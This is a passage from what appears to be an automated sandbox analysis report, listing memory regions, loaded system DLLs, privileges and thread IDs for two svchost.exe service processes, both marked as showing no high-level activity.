| cryptdll.dll | 0x7ffc54260000 | 0x7ffc54273fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| negoexts.dll | 0x7ffc54290000 | 0x7ffc542b8fff | Memory Mapped File | rwx |
|
|
|
- |
| joinutil.dll | 0x7ffc542c0000 | 0x7ffc542e0fff | Memory Mapped File | rwx |
|
|
|
- |
| netprovfw.dll | 0x7ffc542f0000 | 0x7ffc54304fff | Memory Mapped File | rwx |
|
|
|
- |
| sspisrv.dll | 0x7ffc54310000 | 0x7ffc5431bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffc57900000 | 0x7ffc57968fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #49: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #49 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k DcomLaunch |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x23c |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
538
0x
A34
0x
8BC
0x
8A0
0x
928
0x
AB4
0x
508
0x
560
0x
44C
0x
7F4
0x
7E4
0x
7E0
0x
7DC
0x
3D8
0x
31C
0x
314
0x
2B8
0x
2B4
0x
2A4
0x
2A0
0x
280
0x
260
0x
240
0x
D84
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000f988e30000 | 0xf988e30000 | 0xf988e3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f988e40000 | 0xf988e40000 | 0xf988e44fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f988e50000 | 0xf988e50000 | 0xf988e63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f988e70000 | 0xf988e70000 | 0xf988eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f988ef0000 | 0xf988ef0000 | 0xf988ef3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f988f00000 | 0xf988f00000 | 0xf988f00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f988f10000 | 0xf988f10000 | 0xf988f11fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f988f20000 | 0xf988f20000 | 0xf988f20fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f988f30000 | 0xf988f30000 | 0xf988f30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f988f40000 | 0xf988f40000 | 0xf988f40fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f988f50000 | 0xf988f50000 | 0xf988f56fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f988f60000 | 0xf988f60000 | 0xf988fdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f988fe0000 | 0xf988fe0000 | 0xf988fe0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f988ff0000 | 0xf988ff0000 | 0xf988ff0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989000000 | 0xf989000000 | 0xf9890fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xf989100000 | 0xf9891bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f9891c0000 | 0xf9891c0000 | 0xf98923ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f989240000 | 0xf989240000 | 0xf989240fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f989250000 | 0xf989250000 | 0xf989250fff | Pagefile Backed Memory | r |
|
|
|
- |
| lsm.dll.mui | 0xf989260000 | 0xf989262fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f989270000 | 0xf989270000 | 0xf989276fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989280000 | 0xf989280000 | 0xf9892fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989300000 | 0xf989300000 | 0xf98937ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xf989380000 | 0xf989380fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f989390000 | 0xf989390000 | 0xf989390fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f9893a0000 | 0xf9893a0000 | 0xf9893a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f9893b0000 | 0xf9893b0000 | 0xf9893b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f9893c0000 | 0xf9893c0000 | 0xf9893c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f9893d0000 | 0xf9893d0000 | 0xf9893d6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989400000 | 0xf989400000 | 0xf9894fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989500000 | 0xf989500000 | 0xf9895fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989700000 | 0xf989700000 | 0xf98977ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989780000 | 0xf989780000 | 0xf98987ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989880000 | 0xf989880000 | 0xf9898fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989900000 | 0xf989900000 | 0xf98997ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989980000 | 0xf989980000 | 0xf989a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989a80000 | 0xf989a80000 | 0xf989b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989b80000 | 0xf989b80000 | 0xf989c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989c80000 | 0xf989c80000 | 0xf989d7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f989d80000 | 0xf989d80000 | 0xf989da9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f989dc0000 | 0xf989dc0000 | 0xf989dc6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f989e00000 | 0xf989e00000 | 0xf989efffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xf989f00000 | 0xf98a236fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f98a240000 | 0xf98a240000 | 0xf98a33ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f98a340000 | 0xf98a340000 | 0xf98a3fffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f98a400000 | 0xf98a400000 | 0xf98a4fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f98a500000 | 0xf98a500000 | 0xf98a687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000f98a690000 | 0xf98a690000 | 0xf98a810fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000f98a820000 | 0xf98a820000 | 0xf98a91ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98a920000 | 0xf98a920000 | 0xf98aa1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98aa20000 | 0xf98aa20000 | 0xf98aa9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98aaa0000 | 0xf98aaa0000 | 0xf98ab9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98aba0000 | 0xf98aba0000 | 0xf98ac9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98aca0000 | 0xf98aca0000 | 0xf98ad9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98ada0000 | 0xf98ada0000 | 0xf98ae1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98ae20000 | 0xf98ae20000 | 0xf98ae9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98aea0000 | 0xf98aea0000 | 0xf98af1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f98af20000 | 0xf98af20000 | 0xf98af9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffe10000 | 0x7df5ffe10000 | 0x7ff5ffe0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e080a000 | 0x7ff6e080a000 | 0x7ff6e080bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e080c000 | 0x7ff6e080c000 | 0x7ff6e080dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e080e000 | 0x7ff6e080e000 | 0x7ff6e080ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0810000 | 0x7ff6e0810000 | 0x7ff6e0811fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0812000 | 0x7ff6e0812000 | 0x7ff6e0813fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0814000 | 0x7ff6e0814000 | 0x7ff6e0815fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0816000 | 0x7ff6e0816000 | 0x7ff6e0817fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0818000 | 0x7ff6e0818000 | 0x7ff6e0819fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e081a000 | 0x7ff6e081a000 | 0x7ff6e081bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e081c000 | 0x7ff6e081c000 | 0x7ff6e081dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e081e000 | 0x7ff6e081e000 | 0x7ff6e081ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0820000 | 0x7ff6e0820000 | 0x7ff6e0821fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0822000 | 0x7ff6e0822000 | 0x7ff6e0823fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0824000 | 0x7ff6e0824000 | 0x7ff6e0825fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0826000 | 0x7ff6e0826000 | 0x7ff6e0827fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0828000 | 0x7ff6e0828000 | 0x7ff6e0829fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e082a000 | 0x7ff6e082a000 | 0x7ff6e082bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e082c000 | 0x7ff6e082c000 | 0x7ff6e082dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e082e000 | 0x7ff6e082e000 | 0x7ff6e082ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e0830000 | 0x7ff6e0830000 | 0x7ff6e092ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e0930000 | 0x7ff6e0930000 | 0x7ff6e0952fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e0954000 | 0x7ff6e0954000 | 0x7ff6e0955fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0956000 | 0x7ff6e0956000 | 0x7ff6e0956fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e095a000 | 0x7ff6e095a000 | 0x7ff6e095bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e095c000 | 0x7ff6e095c000 | 0x7ff6e095dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e095e000 | 0x7ff6e095e000 | 0x7ff6e095ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| capauthz.dll | 0x7ffc48880000 | 0x7ffc48895fff | Memory Mapped File | rwx |
|
|
|
- |
| licensemanagerapi.dll | 0x7ffc488a0000 | 0x7ffc488abfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelproxy.dll | 0x7ffc48b80000 | 0x7ffc48b94fff | Memory Mapped File | rwx |
|
|
|
- |
| sebbackgroundmanagerpolicy.dll | 0x7ffc48ba0000 | 0x7ffc48badfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll | 0x7ffc48bb0000 | 0x7ffc48bc7fff | Memory Mapped File | rwx |
|
|
|
- |
| acpbackgroundmanagerpolicy.dll | 0x7ffc48bd0000 | 0x7ffc48be6fff | Memory Mapped File | rwx |
|
|
|
- |
| cbtbackgroundmanagerpolicy.dll | 0x7ffc48bf0000 | 0x7ffc48bfbfff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffc48ff0000 | 0x7ffc49459fff | Memory Mapped File | rwx |
|
|
|
- |
| backgroundmediapolicy.dll | 0x7ffc4afe0000 | 0x7ffc4afeffff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffc4b030000 | 0x7ffc4b072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ffc4f8f0000 | 0x7ffc4f981fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffc51340000 | 0x7ffc513b1fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffc51410000 | 0x7ffc5141ffff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ffc514f0000 | 0x7ffc514fbfff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffc52730000 | 0x7ffc527f7fff | Memory Mapped File | rwx |
|
|
|
- |
| dab.dll | 0x7ffc52e10000 | 0x7ffc52e30fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ffc52e40000 | 0x7ffc52e7efff | Memory Mapped File | rwx |
|
|
|
- |
| systemeventsbrokerserver.dll | 0x7ffc52e80000 | 0x7ffc52ee1fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ffc52f40000 | 0x7ffc5302dfff | Memory Mapped File | rwx |
|
|
|
- |
| psmserviceexthost.dll | 0x7ffc53030000 | 0x7ffc530b3fff | Memory Mapped File | rwx |
|
|
|
- |
| wmsgapi.dll | 0x7ffc530c0000 | 0x7ffc530c8fff | Memory Mapped File | rwx |
|
|
|
- |
| sysntfy.dll | 0x7ffc530d0000 | 0x7ffc530dbfff | Memory Mapped File | rwx |
|
|
|
- |
| lsm.dll | 0x7ffc530e0000 | 0x7ffc531a0fff | Memory Mapped File | rwx |
|
|
|
- |
| rmclient.dll | 0x7ffc531b0000 | 0x7ffc531d7fff | Memory Mapped File | rwx |
|
|
|
- |
| psmsrv.dll | 0x7ffc531e0000 | 0x7ffc53211fff | Memory Mapped File | rwx |
|
|
|
- |
| bisrv.dll | 0x7ffc53220000 | 0x7ffc532a5fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcss.dll | 0x7ffc533c0000 | 0x7ffc5349afff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| tdh.dll | 0x7ffc534d0000 | 0x7ffc535c7fff | Memory Mapped File | rwx |
|
|
|
- |
| hid.dll | 0x7ffc535d0000 | 0x7ffc535dbfff | Memory Mapped File | rwx |
|
|
|
- |
| umpoext.dll | 0x7ffc535e0000 | 0x7ffc535f5fff | Memory Mapped File | rwx |
|
|
|
- |
| umpo.dll | 0x7ffc53600000 | 0x7ffc5361afff | Memory Mapped File | rwx |
|
|
|
- |
| umpnpmgr.dll | 0x7ffc53620000 | 0x7ffc5363ffff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| eventaggregation.dll | 0x7ffc54370000 | 0x7ffc54389fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x7ffc57a30000 | 0x7ffc57a9efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 1 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #50: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #50 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k RPCSS |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x268 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
334
0x
4D0
0x
6B0
0x
614
0x
608
0x
520
0x
344
0x
300
0x
29C
0x
294
0x
288
0x
284
0x
27C
0x
26C
0x
F5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000005c5a1b0000 | 0x5c5a1b0000 | 0x5c5a1bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| mswsock.dll.mui | 0x5c5a1c0000 | 0x5c5a1c2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005c5a1d0000 | 0x5c5a1d0000 | 0x5c5a1e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005c5a1f0000 | 0x5c5a1f0000 | 0x5c5a26ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005c5a270000 | 0x5c5a270000 | 0x5c5a273fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005c5a280000 | 0x5c5a280000 | 0x5c5a280fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005c5a290000 | 0x5c5a290000 | 0x5c5a291fff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0x5c5a2a0000 | 0x5c5a31afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005c5a320000 | 0x5c5a320000 | 0x5c5a326fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x5c5a330000 | 0x5c5a3edfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005c5a3f0000 | 0x5c5a3f0000 | 0x5c5a3f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005c5a400000 | 0x5c5a400000 | 0x5c5a4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5a500000 | 0x5c5a500000 | 0x5c5a57ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005c5a580000 | 0x5c5a580000 | 0x5c5a580fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005c5a5e0000 | 0x5c5a5e0000 | 0x5c5a5e6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5a600000 | 0x5c5a600000 | 0x5c5a6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5a700000 | 0x5c5a700000 | 0x5c5a7fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x5c5a800000 | 0x5c5ab36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005c5ab40000 | 0x5c5ab40000 | 0x5c5ac3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5ac40000 | 0x5c5ac40000 | 0x5c5ad3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5ad40000 | 0x5c5ad40000 | 0x5c5ae3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5ae40000 | 0x5c5ae40000 | 0x5c5af3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5af40000 | 0x5c5af40000 | 0x5c5b03ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b040000 | 0x5c5b040000 | 0x5c5b13ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b140000 | 0x5c5b140000 | 0x5c5b23ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b240000 | 0x5c5b240000 | 0x5c5b33ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b340000 | 0x5c5b340000 | 0x5c5b43ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b500000 | 0x5c5b500000 | 0x5c5b5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b600000 | 0x5c5b600000 | 0x5c5b6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005c5b700000 | 0x5c5b700000 | 0x5c5b7fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff4c0000 | 0x7df5ff4c0000 | 0x7ff5ff4bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0490000 | 0x7ff6e0490000 | 0x7ff6e0491fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0492000 | 0x7ff6e0492000 | 0x7ff6e0493fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0494000 | 0x7ff6e0494000 | 0x7ff6e0495fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0496000 | 0x7ff6e0496000 | 0x7ff6e0497fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0498000 | 0x7ff6e0498000 | 0x7ff6e0499fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e049a000 | 0x7ff6e049a000 | 0x7ff6e049bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e049c000 | 0x7ff6e049c000 | 0x7ff6e049dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e049e000 | 0x7ff6e049e000 | 0x7ff6e049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6e04a0000 | 0x7ff6e04a0000 | 0x7ff6e059ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6e05a0000 | 0x7ff6e05a0000 | 0x7ff6e05c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6e05c3000 | 0x7ff6e05c3000 | 0x7ff6e05c4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e05c5000 | 0x7ff6e05c5000 | 0x7ff6e05c6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e05c7000 | 0x7ff6e05c7000 | 0x7ff6e05c8fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e05c9000 | 0x7ff6e05c9000 | 0x7ff6e05cafff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e05cb000 | 0x7ff6e05cb000 | 0x7ff6e05ccfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e05cd000 | 0x7ff6e05cd000 | 0x7ff6e05cefff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e05cf000 | 0x7ff6e05cf000 | 0x7ff6e05cffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff6e1100000 | 0x7ff6e110cfff | Memory Mapped File | rwx |
|
|
|
- |
| capauthz.dll | 0x7ffc48880000 | 0x7ffc48895fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffc50980000 | 0x7ffc509e7fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffc51410000 | 0x7ffc5141ffff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffc532b0000 | 0x7ffc532e1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffc532f0000 | 0x7ffc53371fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7ffc53380000 | 0x7ffc53392fff | Memory Mapped File | rwx |
|
|
|
